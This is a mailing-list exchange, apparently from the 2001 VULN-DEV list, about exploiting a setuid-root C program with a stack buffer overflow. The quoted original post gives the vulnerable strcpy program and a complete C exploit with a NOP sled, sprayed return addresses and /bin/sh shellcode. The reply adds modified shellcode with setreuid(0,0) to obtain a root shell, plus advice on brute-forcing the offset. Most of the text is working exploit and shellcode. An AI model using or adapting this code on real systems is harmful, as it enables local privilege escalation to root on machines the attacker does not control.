AW: question on an exploit

["ConKing" <Connection_king () busch-hacker de>]

char linuxshell[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";I think you're using the wrong
Shellcode... use this one:

This shellcode only opens a normal shell with normal privilegies *normal*
*g*
so there should be a setreuid(0,0); so add this shellcode:

char shell[] =
"\x31\xc9\x31\xdb\x89\xc8\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
                        "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
// I added the setreuid(0,0) in the shellcode as you can see at the
beginning...

Greets

ConKing

PS: To test the offset.. or to brute force it.. to get the right offset use
my offsetbruteforcer under www.usad.li/robin under MY PROGRAMS ...
Attention! ... It can be that you get a shell and only the same as
afterwards.. then use CTRL + D until you get a root shell it should work..
the offset ist about 100 more than the buffer....

-----Ursprungliche Nachricht-----
Von: roland kwitt [mailto:sniper () f1lesystem net]
Gesendet: Donnerstag, 17. Mai 2001 16:16
An: VULN-DEV () securityfocus com
Betreff: question on an exploit




hi folks,


recently i found a very good howto about buffer overflowing

and tried to code an exploit for a little program.


#####################
Prog. to be exploited
#####################

int main(int argc, char *argv[])
{
        char buffer[500];
        if(argc>=2) strcpy(buffer, argv[1]);
        return 0;
}


As anybody can see the program does not check the size of the

input copied in buffer. Therefor it should be able to

exploit it and gain root access through spawning a root shell.

The perms of that prog are set to:

418444   16 -rwsr-xr-x   1 root     users       13335 May 17 15:22 vuln


The exploit looks like this:



#include <stdlib.h>
#include <stdio.h>

#define BUFFERSIZE 600  /* vulnerable buffer + 100 bytes */

char linuxshell[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"

"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
                    "\x80\xe8\xde\xff\xff\xff/bin/sh";

unsigned long sp(void)
{
        __asm__("movl %esp, %eax");
}

void usage(char *cmd)
{
        printf("\nusage: %s <offset>\n\n", cmd);
        exit(-1);
}

int main(int argc, char *argv[])
{
        int i, offset, os;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr, *osptr;

        if(argc<2) usage(argv[0]);

        offset = atoi(argv[1]);
        esp    = sp();
        ret    = esp-offset;

        printf("Stack pointer: 0x%x\n", esp);
        printf("       Offset: 0x%x\n", offset);
        printf("  Return addr: 0x%x\n", ret);

        if(!(buffer = malloc(BUFFERSIZE))) {
                printf("Couldn't allocate memory.\n");
                exit(-1);
        }

        ptr = buffer;
        addr_ptr = (long *)ptr;
        for(i=0; i<BUFFERSIZE; i+=4)
                *(addr_ptr++) = ret;

        for(i=0; i<BUFFERSIZE/2; i++)
                buffer[i] = '\x90';

        ptr = buffer + ((BUFFERSIZE/2) - (strlen(linuxshell)/2));
        for(i=0; i<strlen(linuxshell); i++)
                *(ptr++) = linuxshell[i];


        buffer[BUFFERSIZE-1] = 0;
        execl("./vuln", "vulnerable", buffer, 0);

        return 0;
}

As a tried to execute the exploit using "exploit 0" (offset)

the only thing i got was an ordinary user shell but not

a root shell. Can somebody tell me why the setuid flag

is ignored!!


Thanks, sniper!!